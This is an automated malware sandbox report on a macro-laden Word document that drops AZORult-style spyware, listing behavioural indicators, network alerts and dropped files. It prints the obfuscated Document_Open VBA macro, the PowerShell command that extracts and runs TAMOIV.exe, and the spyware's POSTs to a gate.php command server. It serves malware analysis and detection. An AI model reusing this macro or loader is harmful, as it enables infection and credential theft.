aa317af7a2307040e7fd3a4a1df33430 (1).zip
This report is generated from a file or URL submitted to this webservice on February 16th 2018 17:41:40 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v7.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
- POSTs files to a webserver
- Evasive
- Possibly checks for the presence of an Antivirus engine
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- a092584ac514bf4b9d3d58d7ce8261b3329a327055784840dc9a4ab5e12ad890
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 12
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET TROJAN Trojan Generic - POST To gate.php with no accept headers" (SID: 2022985, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN AZORult Variant Checkin" (SID: 2821358, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "CrowdStrike Azorult V1 traffic" (SID: 181717601, Rev: 20171116, Severity: 1) categorized as "A Network Trojan was detected" - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 9/59 Antivirus vendors marked sample as malicious (15% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 28/67 Antivirus vendors marked dropped file "TAMOIV.exe" as malicious (classified as "Trojan.Agent" with 41% detection rate)
- source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
28/67 Antivirus vendors marked spawned process "TAMOIV.exe" (PID: 3716) as malicious (classified as "Trojan.Agent" with 41% detection rate)
28/67 Antivirus vendors marked spawned process "TAMOIV.exe" (PID: 2192) as malicious (classified as "Trojan.Agent" with 41% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Sets thread context in a remote process (often injection or process hollowing)
- details
- "TAMOIV.exe" set thread context in remote process "%TEMP%\TAMOIV.exe" (PID 00000890)
- source
- API Call
- relevance
- 10/10
-
Writes data to a remote process
- details
-
"WINWORD.EXE" wrote 32 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 1308)
"WINWORD.EXE" wrote 52 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 1308)
"WINWORD.EXE" wrote 4 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 1308)
"powershell.exe" wrote 32 bytes to a remote process "%TEMP%\TAMOIV.exe" (Handle: 1160)
"powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 1160)
"powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 1160)
"TAMOIV.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 192)
"TAMOIV.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 192)
"TAMOIV.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 192) - source
- API Call
- relevance
- 6/10
-
Sets thread context in a remote process (often injection or process hollowing)
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "104.168.177.9": ...
URL: http://doc2docs.net/docusign/pro (AV positives: 6/67 scanned on 02/16/2018 16:05:01)
URL: http://vicmaxcgi.com/Fix/stripe.com/account (AV positives: 8/67 scanned on 02/16/2018 10:17:14)
URL: http://vicmaxcgi.com/ (AV positives: 5/67 scanned on 02/16/2018 08:43:39)
URL: http://doc2docs.net/ (AV positives: 5/67 scanned on 02/16/2018 08:35:27)
URL: http://stevture.com/click/stripe.com/account/ (AV positives: 6/67 scanned on 02/16/2018 08:09:03)
File SHA256: c515ece145248824c62296e3b9c52c6d2fa4a49b9033fe42ea959971886d9ca1 (AV positives: 20/60 scanned on 02/16/2018 16:05:06)
File SHA256: 312ba50c922bc52ea7223b150c6c6e8c99e5d2a9be705e6dd96b756f6c96f75e (AV positives: 3/68 scanned on 01/24/2018 22:04:53)
File SHA256: f14488deb49d10be5c70c980583cdce74e840d13def570151ceb2143a9a956a8 (AV positives: 4/60 scanned on 01/23/2018 18:26:03)
File SHA256: 9139c211c455c74cf3c0d545303a112492a6724df4c8fa54f63262cfeaeaccec (AV positives: 3/70 scanned on 11/27/2017 01:54:59)
File SHA256: 0e3fa4f47278bf6ef916418d951db86c786ab3593a42827ed5713d58e6fb5cd8 (AV positives: 4/71 scanned on 11/04/2017 22:41:03) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 14
-
Anti-Detection/Stealthyness
-
Creates a resource fork (ADS) file (often used to hide data)
- details
- "powershell.exe" created file "%TEMP%\f.doc:Zone.Identifier"
- source
- API Call
- relevance
- 8/10
-
Possibly checks for the presence of an Antivirus engine
- details
- "ComodoDragon" (Indicator: "comodo")
- source
- File/Memory
- relevance
- 3/10
-
Creates a resource fork (ADS) file (often used to hide data)
-
Anti-Reverse Engineering
-
Looks up many procedures within the same disassembly stream (often used to hide usage)
- details
-
Found 47 calls to GetProcAddress@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
Found 11 calls to GetProcAddress@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Looks up many procedures within the same disassembly stream (often used to hide usage)
-
General
-
Contains ability to find and load resources of a specific module
- details
-
FindResourceA@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
FindResourceA@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
POSTs files to a webserver
- details
-
"POST /conto/gate.php HTTP/1.1Host: eualube.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Referer: eualube.com/conto/gate.phpConnection: closeContent-Length: 264Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0" with no payload
"POST /conto/gate.php HTTP/1.1Host: eualube.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Referer: eualube.com/conto/gate.phpConnection: closeContent-Length: 674Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 1308)
"powershell.exe" is creating a new process (Name: "%TEMP%\TAMOIV.exe", Handle: 1160)
"TAMOIV.exe" is creating a new process (Name: "%TEMP%\TAMOIV.exe", Handle: 192) - source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "TAMOIV.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Creates new processes
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
Spyware/Information Retrieval
-
Contains ability to retrieve keyboard strokes
- details
- GetKeyboardState@USER32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 8/10
-
Contains ability to retrieve keyboard strokes
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings" - source
- Static Parser
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e9603334ec" to virtual address "0x75684731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "245b9b89" to virtual address "0x5A0D9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e9239936ec" to virtual address "0x75685DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "c4ca3c7780bb3c77aa6e3d779fbb3c7708bb3c7746ce3c7761383d77de2f3d77d0d93c770000000017790f774f910f777f6f0f77f4f70f7711f70f77f2830f77857e0f7700000000" to virtual address "0x73601000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "3b7b9589" to virtual address "0x5B4C10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e99e485bea" to virtual address "0x773D3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "bd0e2d89" to virtual address "0x695CCA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "82412d89" to virtual address "0x62D4F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "e99a5433ec" to virtual address "0x75683E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9365534ec" to virtual address "0x75683EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba0c82e60468dcf5026ac3" to virtual address "0x04E65B44"
"WINWORD.EXE" wrote bytes "093874e7" to virtual address "0x693D42C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e9c53244ec" to virtual address "0x75B26143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "952dc189" to virtual address "0x61BE0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "0a2c2d89" to virtual address "0x670D78E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "b2c6838a" to virtual address "0x2FB11B94" (part of module "WINWORD.EXE")
"powershell.exe" wrote bytes "7ec6b0e6" to virtual address "0x68B91FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "4053267758582777186a2777653c28770000000000bf3c770000000056cc3c77000000007cca3c7700000000376843756a2c2877d62d287700000000206943750000000029a63c7700000000a48d437500000000f70e3c7700000000" to virtual address "0x76B61000" (part of module "NSI.DLL")
"powershell.exe" wrote bytes "0857d0750478d9750000000051c1ab769498ab76ee9cab7675dcad76273ead76efb2b1760000000046ce3c77013d3d7738ed3d77cfcd3c7731233c77de2f3d77c4ca3c7780bb3c77aa6e3d779fbb3c7792bb3c7746ba3c770abf3c7700000000" to virtual address "0x73631000" (part of module "SHFOLDER.DLL")
"TAMOIV.exe" wrote bytes "92e6237779a82877be722877d62d28771de2237705a22877bee32377616f2877684126770050267700000000ad378b758b2d8b75b6418b7500000000" to virtual address "0x74881000" (part of module "WSHTCPIP.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\aa317af7a2307040e7fd3a4a1df33430.doc"" (Show Process)
Spawned process "powershell.exe" with commandline "Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe');" (Show Process)
Spawned process "TAMOIV.exe" (Show Process)
Spawned process "TAMOIV.exe" (Show Process)
Spawned process "DW20.EXE" with commandline "-x -s 1420" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 25
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetLocalTime@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
-
GetVersionExA@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
GetVersion@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
GetVersion@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the system locale
- details
- GetUserDefaultLCID@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query volume size
- details
- GetDiskFreeSpaceA@KERNEL32.DLL from TAMOIV.exe (PID: 3716) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 3/10
-
Makes a code branch decision directly after an API that is environment aware
- details
-
Found API call GetVersion@KERNEL32.DLL (Target: "TAMOIV.exe"; Stream UID: "00019790-00003716-27388-2792-00450E10")
which is directly followed by "cmp ax, 0004h" and "jc 00450FC6h". See related instructions: "...+151 call 00404314h+156 call 00406420h ;GetVersion+161 and eax, 000000FFh+166 cmp ax, 0004h+170 jc 00450FC6h" ... from TAMOIV.exe (PID: 3716) (Show Stream)
Found API call GetVersion@KERNEL32.DLL (Target: "TAMOIV.exe"; Stream UID: "00019790-00003716-27388-2748-0044C794")
which is directly followed by "cmp ax, 0004h" and "setnb byte ptr [00479B18h]". See related instructions: "...+26 call 00406420h ;GetVersion+31 and eax, 000000FFh+36 cmp ax, 0004h+40 setnb byte ptr [00479B18h]" ... from TAMOIV.exe (PID: 3716) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
- "eualube.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "104.168.177.9:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"G.PdBGF<Njf[[\5GWORGRG"f2fF<GjW5dBGG-{W
RGRGRG.wcBG7W-W-WGSW-W-WGvcBGCv" - source
- File/Memory
- relevance
- 1/10
-
Contains SQL queries
- details
-
"INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);"
"UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;"
"UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;" - source
- File/Memory
- relevance
- 2/10
-
Contains embedded VBA macros
- details
- File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Private Sub Document_Open() Dim pg, bl As String Dim fE As Long Dim qu As String Dim aD() As Byte qu = ThisDocument.BuiltInDocumentProperties("Tit" + "le") aD = StrConv(qu, vbFromUnicode) For fE = 0 To UBound(aD) aD(fE) = aD(fE) - 7 Next fE pg = StrConv(aD, vbUnicode) bl = StrReverse(pg) Shell (Replace(Replace(Split(bl, Chr(124))(1), Split(bl, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0End Sub"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
- Normalized macro string: "Private Sub Document_Open() Dim pg, bl As String Dim fE As Long Dim qu As String Dim aD() As Byte qu = ThisDocument.BuiltInDocumentProperties(Title) aD = StrConv(qu, vbFromUnicode) For fE = 0 To UBound(aD) aD(fE) = aD(fE) - 7 Next fE pg = StrConv(aD, vbUnicode) bl = StrReverse(pg) Shell (eplace(eplace(Split(bl, |)(1), Split(bl, |)(0), .), FPATH, ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0End Sub"
- source
- File/Memory
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFF7EC200435B29474.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF5463ED2E244C574A.TMP"
"powershell.exe" created file "%TEMP%\f.doc"
"powershell.exe" created file "%TEMP%\f.doc:Zone.Identifier"
"powershell.exe" created file "%TEMP%\TAMOIV.exe" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-58022"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-58022"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\DBWinMutex"
"Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZoneAttributeCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\10MU_ACB10_S-1-5-5-0-58022"
"Local\ZonesLockedCacheCounterMutex" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 5A090000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 65A50000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "powershell.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.22C="4""
Process "TAMOIV.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "DW20.EXE" (Show Process) was launched with modified environment variables: "PSModulePath" - source
- Monitored Target
- relevance
- 10/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "powershell.exe" with commandline "Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe');" (Show Process)
Spawned process "TAMOIV.exe" (Show Process)
Spawned process "TAMOIV.exe" (Show Process)
Spawned process "DW20.EXE" with commandline "-x -s 1420" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Contains ability to lookup the windows account name
- details
- GetUserNameW@ADVAPI32.DLL from TAMOIV.exe (PID: 2192) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"aa317af7a2307040e7fd3a4a1df33430.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Sat Feb 17 00:42:47 2018 mtime=Sat Feb 17 00:42:47 2018 atime=Sat Feb 17 00:43:00 2018 length=1369092 window=hide"
"~$317af7a2307040e7fd3a4a1df33430.doc" has type "data"
"aa317af7a2307040e7fd3a4a1df33430.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Sat Feb 17 00:42:47 2018 mtime=Sat Feb 17 00:42:47 2018 atime=Sat Feb 17 00:43:00 2018 length=1369092 window=hide"
"TAMOIV.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"Desktop" has type "empty"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa Author: Caleb Cheng Template: Normal Last Saved By: caive Revision Number: 60 Name of Creating Application: Microsoft Office Word Total Editing Time: 46:00 Create Time/Date: Sat Feb 3 02:00:00 2018 Last Saved Time/Date: Fri Feb 16 01:17:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 1 Security: 0"
"MSO3081.acl" has type "data"
"~WRD0002.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa Author: Caleb Cheng Template: Normal Last Saved By: caive Revision Number: 60 Name of Creating Application: Microsoft Office Word Total Editing Time: 48:00 Create Time/Date: Sat Feb 3 02:00:00 2018 Last Saved Time/Date: Fri Feb 16 01:17:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 3 Security: 0"
"~WRS{F1A3FD71-A43B-4BAC-9D39-CFFD2B377A63}.tmp" has type "data"
"1571463673.cvr" has type "data"
"~$Normal.dotm" has type "data"
"6LACNQ6NXQXSDUZITFDL.temp" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F1A3FD71-A43B-4BAC-9D39-CFFD2B377A63}.tmp" - source
- API Call
- relevance
- 7/10
-
Contains ability to lookup the windows account name
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "KPcu={+:9//>].gE"
Pattern match: "http://ns.adobe.com/xap/1.0/"
Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
Pattern match: "xczg-.BIe/%/WqI"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "eualube.com/conto/gate.php"
Heuristic match: "eualube.com"
Heuristic match: "6 Y:6(8mmmmBK3^*>@)k7.aT"
Pattern match: "H.vP/62g[mmmm"
Pattern match: "NBmmmmjc.YrM/8[Ndu+.g}bXRR|4mmmm`=und}6+7IM"
Pattern match: "kY.wpxu/mmmmJd"
Heuristic match: "G*.BB"
Heuristic match: "lRIJlYXU]`:slX6&^vXVv&XRI)v`lXUB]IIlUIU\llUB_9IRWB_MIRW]`$AUZ*EXUIf.Rw"
Heuristic match: "IGX[Wa[_WoGy[wW'GWG-G?GQG[WCCCCCCCCCzCpCbCCCRCRC@C.CC"
Pattern match: "WWw.v.f2fCkjW5O5XUW]`\j&5ZU5&5SXU\dINvI=&S_[[]`aOKUMGCSjf[[\5POHGLf[[\5y" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
